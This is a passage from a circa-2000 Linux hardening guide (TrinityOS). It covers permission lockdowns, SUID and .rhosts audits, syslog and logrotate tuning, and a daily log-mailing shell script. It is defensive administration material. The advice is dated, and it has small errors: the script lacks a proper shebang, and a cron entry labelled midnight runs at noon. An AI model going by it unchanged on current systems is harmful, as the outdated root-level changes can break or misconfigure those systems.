/sbin/mod* chmod 750 /sbin/netreport chmod 750 /sbin/pam* chmod 750 /sbin/pcinitrd chmod 750 /sbin/pnpdump chmod 750 /sbin/portmap chmod 750 /sbin/quotaon chmod 750 /sbin/raidadd chmod 750 /sbin/restore chmod 750 /sbin/runlevel chmod 750 /sbin/stinit echo "This is the old location for klogd. Please disregard any errors if this doesn't work." chmod 750 /sbin/syslogd chmod 750 /sbin/swapon chmod 750 /sbin/tune2fs chmod 750 /sbin/uugetty chmod 750 /sbin/vgetty echo "Files in /usr/bin" chmod 750 /usr/bin/control-panel chmod 750 /usr/bin/comanche chmod 750 /usr/bin/eject chmod 750 /usr/bin/glint chmod 750 /usr/bin/gnome* chmod 750 /usr/bin/gpasswd chmod 750 /usr/bin/ipx* chmod 750 /usr/bin/kernelcfg chmod 755 /usr/bin/lp* chmod 4755 /usr/bin/lpr #NOTE: I feel setting "lpr" to allow any group to execute it is # a bad thing. # # I would like to add UNIX users and even the Samba process to # the "lp" group already defined in /etc/groups and then be able # to put things back to to 4750. BUT.. I just talked to a buddy # of mine and this really isn't possible. Linux doesn't support # multiple groups per file and Linux doesn't support access lists # (ACLs') yet. So.. you either have to do all this or run LPRng. # # Stock perms are: # -r-sr-sr-x 1 root lp 15436 Oct 17 06:49 lpq # -r-sr-sr-x 1 root lp 16176 Oct 17 06:49 lpr # -r-sr-sr-x 1 root lp 16132 Oct 17 06:49 lprm chmod 750 /usr/bin/mformat chmod 750 /usr/bin/minicom chmod 750 /usr/bin/mtools chmod 750 /usr/bin/netcfg chmod 750 /usr/bin/rusers chmod 750 /usr/bin/rwall chmod 750 /usr/bin/uucp echo "Files in /usr/sbin" chmod 750 /usr/sbin/am* chmod 750 /usr/sbin/at* chmod 750 /usr/sbin/automount chmod 750 /usr/sbin/bootp* chmod 750 /usr/sbin/crond chmod 750 /usr/sbin/dhc* chmod 750 /usr/sbin/dip chmod 750 /usr/sbin/dump* chmod 750 /usr/sbin/edquota chmod 750 /usr/sbin/exportfs chmod 750 /usr/sbin/fixmount chmod 750 /usr/sbin/ftpshut chmod 750 /usr/sbin/gated chmod 750 /usr/sbin/group* chmod 750 /usr/sbin/grp* chmod 750 /usr/sbin/imapd chmod 750 /usr/sbin/in.* chmod 750 /usr/sbin/inetd chmod 750 /usr/sbin/ipop* echo "This is the old location for klogd. Please disregard any errors if this doesn't work." chmod 750 /usr/sbin/klogd chmod 750 /usr/sbin/logrotate chmod 750 /usr/sbin/lp* chmod 755 /usr/sbin/lsof chmod 750 /usr/sbin/makemap chmod 750 /usr/sbin/mk-amd-map chmod 750 /usr/sbin/mouseconfig chmod 750 /usr/sbin/named* chmod 750 /usr/sbin/nmbd chmod 750 /usr/sbin/newusers chmod 750 /usr/sbin/ntp* chmod 750 /usr/sbin/ntsysv chmod 750 /usr/sbin/pppd chmod 750 /usr/sbin/pnpprobe chmod 750 /usr/sbin/pw* chmod 750 /usr/sbin/quota* chmod 750 /usr/sbin/rdev chmod 750 /usr/sbin/rdist chmod 750 /usr/sbin/repquota chmod 750 /usr/sbin/rhbackup chmod 750 /usr/sbin/rotatelogs chmod 750 /usr/sbin/rpc* chmod 750 /usr/sbin/rwhod chmod 750 /usr/sbin/samba chmod 750 /usr/sbin/setup chmod 750 /usr/sbin/showmount chmod 750 /usr/sbin/smb* chmod 750 /usr/sbin/sndconfig chmod 750 /usr/sbin/snmp* chmod 750 /usr/sbin/squid echo "This is the old location for sysklogd. Please disregard any errors if this doesn't work." chmod 750 /usr/sbin/syslogd chmod 750 /usr/sbin/taper chmod 750 /usr/sbin/tcpd* chmod 750 /usr/sbin/time* chmod 750 /usr/sbin/tmpwatch chmod 750 /usr/sbin/tunelp chmod 750 /usr/sbin/user* chmod 750 /usr/sbin/uu* chmod 750 /usr/sbin/vi* chmod 750 /usr/sbin/wire-test chmod 750 /usr/sbin/xntp* ========= SUID ROOT PROGRAMS ========= - Check that there aren't any SUID ROOT (programs that execute as the ROOT user) that are WRITABLE by other users. To do this, execute this following command (per http://rlz.ne.mediaone.net/linux/index.html): mkdir -m700 /etc/info find / -type f \( -perm -04000 -o -perm -02000 \) -ls > /etc/info/suid-results So what do you do with these results? Figure out the SUID programs that you need and note which ones they are and where they are. The issue is to just make sure that no other unknonwn programs don't get added to this list. What about just changing their perms to NOT be SUID root? This would be bad because most programs that are usually SUID ROOT *must* be this way or they won't work right. But, for example, GnuPlot on a recent copy of SuSE was found SUID though it shouldn't have been. Later, a person on BugTraq found this and created both a root exploit and patch for it. So... this is where you can be proactive and fix things. For the other SUID programs you don't need or know what they are, change their perms to 700 (chmod 700 *) or even better yet.. change their perms to 700, move them to a temporary directory to later delete them once you are SURE you don't need the programs. *** Once you have resolved all your SUID issues, rename this *** /etc/info/suid-results file to /etc/info/suid-results-checked and then *** fix the permissions: mv /etc/info/suid-results /etc/info/suid-results-checked chmod 600 /etc/info/suid-results-checked We will use this file later as a template file to check for changed SUID files in [Section 9] ========= Looking for R-command files ======= Much like looking for SUID files above, its also a good idea to look for R-command permission files. find / | grep -e ".rhosts" -e "hosts.equiv" > /etc/info/rcmd-results Once you have reviewed this /etc/info/rcmd-results file for any entries that DON'T belong in there, rename it and fix its permissions: mv /etc/info/rcmd-results /etc/info/rcmd-results-checked chmod 600 /etc/info/rcmd-results-checked ========= Fix Xwindows permissions ========== * This was exploited recently in Xfree86 but I still feel that the sticky bit on the /tmp/.X11-unix directory should be set rm -rf /tmp/.X11-unix mkdir -p -m 1777 /tmp/.X11-unix chmod o+t /tmp/.X11-unix ========= LILO setup ========== * Be sure to read [Section 15] regarding LILO security as well ================================================================================ Section 9 - Advanced System Logging and some Cool Tips ===== SYSLOG tuning ===== - SYSLOG is the main UNIX logging tool. With this system, you can setup logging to be very high level to exteamly detailed and have each logging stream goto a different file. Trust me.. SYSLOG is your friend! Edit /etc/syslog.conf and -ADD- the following lines if they aren't already in there: ******* * NOTE!!! All space from the left and right columns MUST BE TABS. * If they are SPACEs, syslog will NOT load! Kinda stupid eh? * Redhat users: ------------- *.warn;*.err /var/log/syslog auth.*;user.*;daemon.none /var/log/loginlog kern.* /var/log/kernel Slackware users: ---------------- *.warn;*.err /var/adm/syslog mail.* /var/adm/maillog auth.*;user.*;daemon.none /var/adm/loginlog kern.* /var/adm/kernel All Distributions: Once you have edited the /etc/syslog.conf file, save your changes and exit the editor. Now, following files must be created for SYSLOG to work: touch /var/log/syslog touch /var/log/loginlog touch /var/log/kernel Next, you might see in your /var/log/messages and /var/log/syslog files lines that look like: -- Nov 28 08:25:42 hostname -- MARK -- -- This is the SYSLOG daemon telling you that SYSLOG is running but had nothing to report. If you don't like this behavior, you can disable it by editing the following file and changing the MARK time out. In /etc/rc.d/init.d/syslog, find the line that says: -- daemon syslogd -- and replace it with: -- daemon syslogd -m 0 -- To make ALL of the above changes go into effect, run: killall -HUP syslogd Next, close down these new files (and existing files) permissions: Redhat: ------- chmod 600 /var/log/syslog chmod 600 /var/log/loginlog chmod 600 /var/log/kernel echo "Make sure old SYSLOG file perms are ok too." chmod 600 /etc/syslog.conf chmod 600 /var/log/cron chmod 700 /var/log/httpd chmod 600 /var/log/httpd/* chmod 600 /var/log/maillog chmod 600 /var/log/messages chmod 600 /var/log/mysql chmod 600 /var/log/netconf.log chmod 700 /var/log/samba chmod 600 /var/log/samba/* chmod 600 /var/log/sendmail.st chmod 600 /var/log/secure chmod 600 /var/log/spooler chmod 700 /var/log/squid chmod 600 /var/log/squid/* chmod 600 /var/log/xferlog Slackware: ---------- chmod 600 /var/adm/syslog chmod 600 /var/adm/loginlog chmod 600 /var/adm/kernel chmod 600 /etc/syslog.conf Ok.. now restart SYSLOG: kill -HUP `ps aux | grep syslogd | grep -v -e grep | awk '{print $2}'` ====== Log Rotations ====== Stock Redhat comes with a tool that will take your SYSLOG log files, rename them to the day they came from, optionally compress them, and then restart the log files for the next day. This is very handy as SYSLOG files can get VERY large. If you are using some other Linux distribution that doesn't have this feature, I highly recommend installed a program that will do this for you (there are many to choose from). - Redhat: Next, allow the new syslog file to be rotated as well. Add these lines to the /etc/logrotate.d/syslog: -- /var/log/kernel { postrotate /usr/bin/killall -9 klogd /usr/sbin/klogd & endscript } /var/log/loginlog { postrotate /usr/bin/killall -HUP syslogd endscript } /var/log/syslog { postrotate /usr/bin/killall -HUP syslogd endscript } -- Also.. I highly recommend that you edit the /etc/logrotate.conf file and do the following: Find "#compress" and remove the "#" so it only says "compress". I also recommend that your #ed out the sections to look like this: [ Why? If these files are rotated, you won't be easily able to ] [ tell when users have logged in. ] ## no packages own lastlog or wtmp -- we'll rotate them here #/var/log/wtmp { # monthly # rotate 1 #} #/var/log/lastlog { # monthly # rotate 1 #} This will then compress the moved log files with Gzip. Finally, some log files explictly default to no-compression. Why? I recommend to add a "#" before the "nocompress" line in each of the following files: /etc/logrotate.d/ftpd /etc/logrotate.d/linuxconf /etc/logrotate.d/sendfax There might be other files in this directory. Check each one of them. Lastly, I recommend to go into the /etc/logrotate.d/ directory and MOVE log config files that you KNOW you won't be using to a "disabled" directory. This is completely dependant on the services that you installed and then on which ones you opted to NOT run. For me, I did: mkdir -m 700 /etc/logrotate.d.disabled mv /etc/logrotate.d/mysql /etc/logrotate.d.disabled mv /etc/logrotate.d/squid /etc/logrotate.d.disabled ====== rc.local cool tips and tuning ====== - Edit the "/etc/rc.d/rc.local" file and add the following lines at the end: The following tip is a personal idea I like for both Redhat and Slackware. By default, then you login to a Linux box, it tells you the Linux distribution name, version, kernel version, and the name of the server. Even worse, Mandrake puts up a very stupid looking Penguin. To me, this is giving away too much info. I rather just prompt users with a "Login: " prompt (if they ever get that far past your packet firewall and TCP wrappers). To fix this, do the following: Place "#s" in front of the following lines like shown: NOTE: This looks a little different with Mandrake.. /etc/rc.d/rc.local -- ## This will overwrite /etc/issue at every boot. So, make any changes you ## want to make to /etc/issue here or you will lose them when you reboot. #echo "" > /etc/issue #echo "Red Hat Linux $R" >> /etc/issue #echo "Kernel $(uname -r) on $a $(uname -m)" >> /etc/issue # #cp -f /etc/issue /etc/issue.net -- Then, do the following: - rm -f /etc/issue - rm -f /etc/issue.net - touch /etc/issue - touch /etc/issue.net - chmod 400 /etc/issue - chmod 400 /etc/issue.net Also, if your Linux box stays up for several months, any kernel messages, errors, firewall hits, etc will OVERWRITE the output from "dmesg". Personally, I *HATE* this but my work-around is to make a "dmesg" copy upon every boot. Do do this, append the following to the bottom of your /etc/rc.d/rc.local file: /etc/rc.d/rc.local -- dmesg >> /etc/info/dmesg -- * Next, the following tip is a great way of seeing your various logs on your Linux box without having to login, etc. Some people might feel that this is a security risk but the this risk stems from physical security. edit the following file FIND each line for say syslog or messages and add in the respective line: /etc/syslog.conf -- *.warn;*.err /dev/tty7 mail.* /dev/tty8 kern.* /dev/tty8 -- To make these changes take effect, run the following line: kill -HUP `ps aux | grep syslogd | grep -v -e grep | awk '{print $2}'` Now, whenever anything is added to those log files, just Goto the ALT-F7 or F8 VTY and see the messages roll by in real-time. - Like the real-time log monitor above, its nice to be able to see errors in real time whenever you suspect problems via a TELNET, SSH, etc. To do this, create the file with the following: Slackware: /root/logit -- #/bin/sh tail -f /var/adm/samba/log.nmb & tail -f /var/adm/samba/log.smb & tail -f /var/adm/xferlog & tail -f /var/adm/maillog & tail -f /var/adm/secure & tail -f /var/adm/syslog & tail -f /var/adm/messages & -- Redhat: /root/logit -- #!/bin/sh tail -f /var/log/samba/log.nmb & tail -f /var/log/samba/log.smb & tail -f /var/log/xferlog & tail -f /var/log/maillog & tail -f /var/log/secure & tail -f /var/log/syslog & tail -f /var/log/messages & -- Now, fix the permissions for it: chmod 700 /root/logit Close the file and then fix it's permissions with "chmod 700 /usr/local/sbin/logit". Now, whenever you are suspecting problems with ANYTHING on your Linux box, just run "/root/logit" and watch the error logs go by in real-time. I A few tips: - type in "clear" at the UNIX prompt now and then to clean the screen up for readibility sake. - When logs are scrolling by but you are looking for something that should show up in a few seconds, hit ENTER a few times to move up the old log info a few lines. When you are done with "logit", run the command "killall tail" to stop all the logging. ====== A more readable BASH prompt ====== Being a command line junky, I use the CLI (command line interface) most of the time. To make things a little more easy on the eye, I recommend that you make the BASH prompt a little more easy on the eye. All NON-root users will get a "green" colored prompt but ROOT users will get a "red" colored prompt. You can do this one of two ways. Have it setup on a PER USER basis or for ALL users. For this example, lets do it just for the ROOT user. 1. Copy the main bash profile to the root user's home directory: cp /etc/bashrc /root/.bashrc NOTE: Why bashrc and not profile? The reason being is that bashrc OVERRIDES anything in the profile. 2. Edit it and find the line for the "PS1" variable and REPLACE it with the following. This will make the prompt be a bright green (easy on the eyes) color for NON-root users and red for ROOT uses. It will also show the machine name and a condensed directory prompt: if [ `id -un` = root ]; then PS1='\[\033[1;31m\]\h:\w\$\[\033[0m\] ' else PS1='\[\033[1;32m\]\h:\w\$\[\033[0m\] ' fi 3. Save the .bashrc, login as the root user or run "su -" and then you should have the new prompt. For more good Bash ideas, check out the BASH howto from Section 5. If you wanted to do it for ALL users, do the above changed to the /etc/bashrc file. ====== Make the apropos database ====== One powerful command in UNIX is the "apropos" or "man -k" command. This will let you do command searches on generic words like "modem", etc. BUT, when you first install Linux, this database isn't complete. It is usually run as a weekly cron job but I recommend to start it now: makewhatis -w & NOTE: This command will take a while depending on HD and CPU speed. If you get ERRORs on the "makewhatis" command as I did in Mandrake 6.1, some of this is how to fix them. I received the following errors (bugs in the distro - already reported as Bug #206). Running this command in Mandrake 7.0 runs without error. -- bzcat: Can't open input file ./fetchmailconf.1.bz2: No such file or directory. bzcat: ./ksh.1.bz2 is not a bzip2 file. bzcat: Can't open input file ./pdksh.1.bz2: No such file or directory. Read file error: ./rec.1 No such file or directory bzcat: ./tixwish.1.bz2 is not a bzip2 file. bzcat: ./efence.3.bz2 is not a bzip2 file. Read file error: ./stm.8 No such file or directory Read file error: ./clockprobe.8 No such file or directory -- line 1: The /usr/man/man1/fetchmailconf.1.bz2 file is a symbolic link to fetchmail.1. This file doesn't exist since its compressed with bz2. To fix it, do: rm /usr/man/man1/fetchmailconf.1.bz2 ln -s /usr/man/man1/fetchmail.1.bz2 /usr/man/man1/fetchmailconf.1.bz2 line 2: The /usr/man/man1/ksh.1.bz2 file isn't really bz2'ed. To fix it, do: mv /usr/man/man1/ksh.1.bz2 /usr/man/man1/ksh.1 bzip2 -z /usr/man/man1/ksh.1 line 3: The /usr/man/man1/pdksh.1.bz2 file points to a non-bz2 file. (sloppy). To fix it, do: Do the line-2 fix above rm /usr/man/man1/pdksh.1.bz2 ln -s /usr/man/man1/ksh.1.bz2 /usr/man/man1/pdksh.1.bz2 line 4: The /usr/man/man1/rec.1 file points to a bogus path /var/tmp/sox-root//usr/man/man1/play.1 (sloppy). To fix it, do: rm /usr/man/man1/rec.1 ln -s /usr/man/man1/play.1.bz2 /usr/man/man1/rec.1.bz2 line 5: The /usr/man/man1/tixwish.1.bz2 file is not a bz2 file. To fix it, do: mv /usr/man/man1/tixwish.1.bz2 /usr/man/man1/tixwish.1 bzip2 -z /usr/man/man1/tixwish.1 line 6: The /usr/man/man3/efence.3.bz2 file is not a valid man page To fix it, do: rm /usr/man/man3/efence.3.bz2 line 7: The /usr/man/man8/stm.8 file points to a non existing file. To fix it, do: rm /usr/man/man8/stm.8 ln -s /usr/man/man8/SVGATextMode.8.bz2 /usr/man/man8/stm.8.bz2 line 8: The /usr/man/man8/clockprobe.8 file points to a non existing file. To fix it, do: rm /usr/man/man8/clockprobe.8 ln -s /usr/man/man8/grabmode.8.bz2 /usr/man/man8/clockprobe.8.bz2 Once you have fixed these problems, re-run "makewhatis -w" and make sure it completes cleanly. ====== Daily email Log ====== ** HIGHLY RECOMMENDEDD for ALL Administrators ** If you are like me, you would like to know if any strange things are happening to your system like (processes failing, hacker attempts, etc). This script also optionally monitors how many times your modem line came online (or failed due to busies,etc) and report what speeds it connected at in a nice summarized table. To do this, follow these next steps (note: this isn't the pretties script I've wrote and it needs a LOT of cleaning but it should work for you). *** Note: Other tools like Psionic LogCheck and Stanford's Swatch tools do this but in in a MUCH cleaner fashion. As I get get those solutions running, this script will be replaced. ALL USERS: The first time this script executes, you will receive some errors regarding: - todays-date and yesterdays-date You can safely ignore these errors! Slackware users: This file should be called "/usr/local/sbin/sendlogs" Redhat users: This file should be called "/usr/local/sbin/sendlogs" (Note: All users: you will need to substitute in your proper mail address ( so you will get your logs ( ( Slackware users.. please edit this file and change the /var/log ( references to /var/adm ( ( Modem users: You will need to un-# out the modem fields and ( make sure that the temp file swaping from ( $1.tmp to $2.tmp etc transisions are correct. ( ( I have this disabled because I'm a cablemodem dude ( now but this worked well. ------------------------------------------------------------------------------ All of TrinityOS's step-by-step instructions, files, and scripts are fully scripted out for an automatic installation at: http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-files/TrinityOS-security.tgz ----------------------------------------------------------------------------- /usr/local/sbin/sendlogs -- /bin/sh # TrinityOS-sendlogs.sh # v04/15/00 # # Part of the copyrighted and servicemarked TrinityOS document. # http://www.ecst.csuchico.edu/~dranch # # Written and Maintained by David A. Ranch # dranch@trinnet.net # Updates: # # 04/15/00 - Added the $HOST variable to easily tune the SUBJECT field to # reflect the name of your Linux system. You should edit this # to reflect your system. # # 04/09/00 - Hmmm.. we need %e and NOT %d for catching dates 01-09. # Basically, I need to reverve the change on 01/17/00. # # 02/21/00 - Doh! We do need the spaces between %b and %d # # 01/17/00 - Fixed all the "date" issues. Date now uses %d over %e and # doesn't use any spaces. # # 01/01/00 - Fixed a missing ">" on line 139 # # 12/16/99 - Fixed the RCMD mailer command at the end. The "mail -s" line # needed to be ONE line # # 11/26/99 - Cleaned things up a bit # - Made all file references absolute # # 02/01/99 - Added "w" to the vitals output # Change this variable to reflect the HOSTNAME of this box # -------------------------------------------------------- HOST="TrinityOS" #Make sure that the "yesterdays-date" file exists. If not, create it. # if [ -f /var/log/todays-date ]; then mv /var/log/todays-date /var/log/yesterdays-date; else date +'%b %e' > /var/log/yesterdays-date; fi #Make sure that the "/etc/info/logs" dir exists. If not, create it. # if [ -a /etc/info ]; then if [ -a /etc/info/logs ]; then echo ""; else mkdir /etc/info/logs; fi else mkdir /etc/info; mkdir /etc/info/logs; fi date +'%b %e' > /var/log/todays-date cat /var/log/messages | grep "`cat /var/log/yesterdays-date`" > /var/log/messlog.`date +'%b%d%y'` export f1=/var/log/messlog.`date +'%b%d%y'` export f2=/var/log/testfile echo "File 1: $f1" echo "File 2: $f2" sed -e "/PWD/d" -e "/PASV/d" -e "/TYPE/d" -e "/PORT/d" -e "/NLST/d" -e "/SYST/d" $f1 > $f1.tmp sed -e "/PASS/d" -e "/QUIT/d" -e "/LIST/d" -e "/CDUP/d" -e "/ATDT/d" -e "/Welcome/d" $f1.tmp > $f2.tmp sed -e "/Using/d" -e "/Connect/d" -e "/Remote/d" -e "/IP address/d" -e "/CHECKSUM/d" $f2.tmp > $f1.tmp sed -e "/Terminated/d" -e "/Terminating/d" -e "/diald/d" -e "/2.2.0/d" -e "/Exit./d" $f1.tmp > $f2.tmp sed -e "/(passwd=guest)/d" -e "/alarm/d" -e "/Failed/d" $f2.tmp > $f1.tmp #For messages - modem specific stuff # #sed -e "/send /d" -e "/expect/d" -e "/OK/d" -e "/AT&F/d" -e "/ATZ/d" -e "/ ^M /d" $f1.tmp > $f2.tmp #sed -e "/Swansea/d" -e "/logging/d" -e "/starting/d" -e "/Ready/d" -e "/0x03f8/d" -e "/0x02f8/d" $f2.tm p > $f1.tmp #sed -e "/sbpcd.c/d" -e "/CR-563/d" -e "/copyright/d" -e "/sockets/d" -e "/Serial/d" -e "/registered/d" $f1.tmp > $f2.tmp #sed -e "/SLIP/d" -e "/sbpcd-0/d" -e "/ATM0X7/d" -e "/1.44M/d" -e "/8272A/d" -e "/statistics/d" $f2.tmp > $f1.tmp #sed -e "/Please/d" -e "/hangup/d" -e "/ip-down/d" -e "/scans/d" $1.tmp -e "/abort on/d" $f1.tmp > $f2.t mp #sed -e "/CONNECT /d" -e "/BUSY/d" -e "/SIGHUP/d" $f2.tmp > $f1.tmp #echo -e "---------------------------------------" > /var/log/header.tmp #echo -e "TrinityOS Call stats for \c" >> /var/log/header.tmp #date >> /var/log/header.tmp #echo -e " " >> /var/log/header.tmp #echo -e "Total number of connects: \c" >> /var/log/header.tmp #grep -c "CONNECT" $f1.tmp >> /var/log/header.tmp #echo -e " 21600: \c" >> /var/log/header.tmp #grep -c "21600" $f1.tmp >> /var/log/header.tmp #echo -e " 26400: \c" >> /var/log/header.tmp #grep -c "26400" $f1.tmp >> /var/log/header.tmp #echo -e " 28800: \c" >> /var/log/header.tmp #grep -c "28800" $f1.tmp >> /var/log/header.tmp #echo -e " 31200: \c" >> /var/log/header.tmp #grep -c "31200" $f1.tmp >> /var/log/header.tmp #echo -e " 33600: \c" >> /var/log/header.tmp #grep -c "33600" $f1.tmp >> /var/log/header.tmp #echo -e " 33600: \c" >> /var/log/header.tmp #grep -c "41333" $f1.tmp >> /var/log/header.tmp #echo -e " 41333: \c" >> /var/log/header.tmp #grep -c "42666" $f1.tmp >> /var/log/header.tmp #echo -e " 42666: \c" >> /var/log/header.tmp #echo -e " " >> /var/log/header.tmp #echo -e "Total number of busys: \c" >> /var/log/header.tmp #grep -c "BUSY" $f1.tmp >> /var/log/header.tmp #echo -e "---------------------------------------" >> /var/log/header.tmp #echo -e " " >> /var/log/header.tmp #cat /var/log/header.tmp >> $f1.tmp #For messages - named specific stuff # sed -e "/Cleaned/d" -e "/USAGE/d" -e "/NSTATS/d" -e "/XSTATS/d" $f1.tmp > $f2.tmp sed -e "/points/d" -e "/Lame server/d" $f2.tmp > $f1.tmp #For messges - SSH specific sed -e "/Generating /d" -e "/generation /d" -e "/NSTATS/d" -e "/XSTATS/d" $f1.tmp > $f2.tmp mv $f2.tmp $f1 rm -R /var/log/*.tmp mail -s "$HOST messages for `cat /var/log/yesterdays-date`" root@localhost < /var/log/messlog.`date +'%b%d%y'` rm /var/log/messlog.`date +'%b%d%y'` echo -e "\tParsed, filtered, mailed and deleted messages" #--------------------------------------------- cat /var/log/syslog | grep "`cat /var/log/yesterdays-date`" > /var/log/syslog.`date +'%b%d%y'` export f1=/var/log/syslog.`date +'%b%d%y'` echo "file 1: $f1" echo "file 2: $f2" #Syslog - modem specific #sed -e "/ got /d" -e "/abort on/d" -e "/expect/d" -e "/ ^M /d" -e "/AT&F1^M^M/d" $f1 > $f1.tmp #sed -e "/ATZ^M^M/d" -e "/ATM0X7S11=40^M^M/d" -e "/Executed/d" -e "/ATDT/d" $f1.tmp > $f2.tmp #sed -e "/Welcome/d" -e "/Using/d" -e "/Connect/d" -e "/Remote/d" -e "/IP address/d" $f2.tmp > $f1.tmp #sed -e "/CHECKSUM/d" -e "/Terminated/d" -e "/Terminating/d" -e "/diald/d" -e "/2.2.0/d" $f1.tmp > $f2.t mp #sed -e "/Exit./d" -e "/(passwd=guest)/d" -e "/alarm/d" -e "/Failed/d" -e "/CONNECT/d" $f2.tmp > $f1.tmp #sed -e "/hangup/d" -e "/RINGING^M/d" $f1.tmp > $f2.tmp #mv $f2.tmp $f1 #syslog FTP, sed -e "/PWD/d" -e "/PASV/d" -e "/LIST/d" -e "/CDUP/d" -e "/RETR/d" -e "/CWD/d" $f1 > $f1.tmp sed -e "/TYPE/d" -e "/PASS/d" -e "/QUIT/d" $f1.tmp > $f2.tmp #For messages sed -e "/send /d" -e "/expect/d" -e "/OK/d" -e "/AT&F/d" -e "/ATZ/d" -e "/ ^M /d" $f2.tmp > $f1.tmp sed -e "/Swansea/d" -e "/logging/d" -e "/starting/d" -e "/Ready/d" -e "/0x03f8/d" $f1.tmp > $f2.tmp sed -e "/0x02f8/d" -e "/sbpcd.c/d" -e "/CR-563/d" -e "/copyright/d" -e "/sockets/d" $f2.tmp > $f1.tmp sed -e "/SLIP/d" -e "/sbpcd-0/d" -e "/1.44M/d" -e "/8272A/d" -e "/statistics/d" $f1.tmp > $f2.tmp sed -e "/Please/d" -e "/hangup/d" -e "/ip-down/d" -e "/scans/d" $f2.tmp > $f1.tmp sed -e "/abort on/d" -e "/Serial/d" -e "/registered/d" $f1.tmp > $f2.tmp mv $f2.tmp $f1 rm -r /var/log/*.tmp mail -s "$HOST syslog for `cat /var/log/yesterdays-date`" root@localhost < /var/log/syslog.`date +'% b%d%y'` rm /var/log/syslog.`date +'%b%d%y'` echo -e "\tParsed, filtered, mailed and deleted syslog" cat /var/log/secure | grep "`cat /var/log/yesterdays-date`" > /var/log/secure.`date +'%b%d%y'` export f1=/var/log/secure.`date +'%b%d%y'` echo "file 1: $f1" echo "file 2: $f2" sed -e "/127/d" $f1 > $f1.tmp mv $f1.tmp /var/log/secure.`date +'%b%d%y'` mail -s "$HOST secure for `cat /var/log/yesterdays-date`" root@localhost < /var/log/secure.`date +'% b%d%y'` rm -r /var/log/*.tmp rm /var/log/secure.`date +'%b%d%y'` echo -e "\tParsed, filtered, mailed and deleted secure" cat /var/log/xferlog | grep "`cat /var/log/yesterdays-date`" > /var/log/xferlog.`date +'%b%d%y'` mail -s "$HOST xferlog for `cat /var/log/yesterdays-date`" root@localhost < /var/log/xferlog.`date + '%b%d%y'` rm /var/log/xferlog.`date +'%b%d%y'` echo -e "\tParsed, filtered, mailed and deleted xferlog" cat /var/log/kernel | grep "`cat /var/log/yesterdays-date`" > /var/log/kernel.`date +'%b%d%y'` mail -s "$HOST kernel for `cat /var/log/yesterdays-date`" root@localhost < /var/log/kernel.`date +'% b%d%y'` rm /var/log/kernel.`date +'%b%d%y'` echo -e "\tParsed, filtered, mailed and deleted kernel" df > /var/log/sendlogs.`date +'%b%d%y'` echo -e "\n\n\n" >> /var/log/sendlogs.`date +'%b%d%y'` w >> /var/log/sendlogs.`date +'%b%d%y'` echo -e "\n\n\n" >> /var/log/sendlogs.`date +'%b%d%y'` free >> /var/log/sendlogs.`date +'%b%d%y'` echo -e "\n\n\n" >> /var/log/sendlogs.`date +'%b%d%y'` ps aux >> /var/log/sendlogs.`date +'%b%d%y'` mail -s "$HOST vitals for `cat /var/log/yesterdays-date`" root@localhost < /var/log/sendlogs.`date + '%b%d%y'` rm -f /var/log/sendlogs.`date +'%b%d%y'` echo -e "\tSent system vitals.." # Create a full file system ls-laR archive in /etc/info # # NOTE: You should ALSO copy this file to somewhere on a DIFFERENT HD, # floppy, etc # in case your mail HD fails. # echo -e "\tCreated full file system ls-laR archive in /etc/info" ls -laR / | bzip2 > /etc/info/logs/ls-laR.`date +'%b%d%y'`.bz2 # cp /etc/info/logs/ls-laR.`date +'%b%d%y'`.bz2 /to/some/other/HD # Create a full file system du archive in /etc/info # # NOTE: You should ALSO copy this file to somewhere on a DIFFERENT HD, # floppy, etc # in case your mail HD fails. # echo -e "\tCreated full file system du archive in /etc/info" du / | bzip2 > /etc/info/logs/du.`date +'%b%d%y'`.bz2 # cp /etc/info/logs/du.`date +'%b%d%y'`.bz2 /to/some/other/HD # Search for SUID programs, compare the results to the approved list and email # the results find / -type f \( -perm -04000 -o -perm -02000 \) -ls > /etc/info/suid-results-new diff /etc/info/suid-results-checked /etc/info/suid-results-new > /etc/info/suid-results-diff # mail -s "$HOST SUID results for `cat /var/log/yesterdays-date`" root@localhost < /etc/info/suid-resu lts-diff rm -f /etc/info/suid-results-new rm -f /etc/info/suid-results-diff echo -e "\tSent SUID check..\n\n" # Search for rhost files, compare the results to the approved list and email # the results find / | grep -e ".rhosts" -e "hosts.equiv" > /etc/info/rcmd-results-new diff /etc/info/rcmd-results-checked /etc/info/rcmd-results-new > /etc/info/rcmd-results-diff # mail -s "$HOST RCMD results for `cat /var/log/yesterdays-date`" root@localhost < /etc/info/rcmd-resu lts-diff rm -f /etc/info/rcmd-results-new rm -f /etc/info/rcmd-results-diff echo -e "\tSent RCMD check..\n\n" -- - Next, make the file executable by running "chmod 700 /usr/local/sbin/sendlogs" - Now create the following directories and fix their permissions mkdir /etc/info mkdir /etc/info/logs chmod -R 700 /etc/info * Before you run the "sendlogs" script, follow the procedure in [Section 18] - Now, you have to make cron run this script every day: BSD-style (Slackware, etc): --------------------------- Edit the file /var/spool/cron/crontabs/root and append the following: -- # Run the sendlogs program at 12:00am everyday 0 12 * * * /usr/local/sbin/sendlogs -- - Thats it. Now, make cron re-read it's config files by doing: kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'` SysV-style (Redhat): -------------------- Create the file /etc/cron.daily/a-sendlogs and enter in: NOTE: Why the name "a-sendlogs"? The reason is because the crontab runs all the files in /etc/cron.daily in alphabetical order. We need to run the sendlogs script BEFORE the "rotatelogs" script executes. ---- #!/bin/sh cd /usr/local/sbin ./sendlogs ---- Now make it executable via "chmod 700 /etc/cron.daily/a-sendlogs" *********** ** Creating a off-line firewall hit log Once you start getting the parsed nightly logs, I HIGHLY recommend that you start creating a on-going log file of your firewall hits. You can learn how to read the firewall hits in [Section 10]. I do this by manually creating a simple ASCII text file that I populate with the date, port #, port type, the source name (manually found via nslookip), and the IP address. For the sites that won't reverse resolve, I just do a traceroute to the closest named hop. So why do I do this? Because you'll soon see trends of simple telnets to full blown port scans from specific IPs and/or domains. Also.. some hackers run port scans that take weeks and not minutes. If you run a log like this, you'll catch them! Here is one example from my "Firewall hits list" of some dirtbag that tried to do a DoS attack against my IMAP service. Not only did my firewall stop him, but TCP wrappers would have stopped him and I logged the fact. I've changed the IP address to protect the luser and myself. NOTE: Not only is it important to log the destination port the hacker was trying to get to but also their source port. This luser was using source port 0 which is common DoS attack method: -- 01/08/99 143/tcp Name: cc6666666-b..nj.home.com Address: 10.0.0.1 from port 0! -- ================================================================================ ================================================================================ Section 10 - MASQ startup and Advanced firewall rulesets for single and multi-NIC setups If you are unfamiliar with how TCP/IP packet 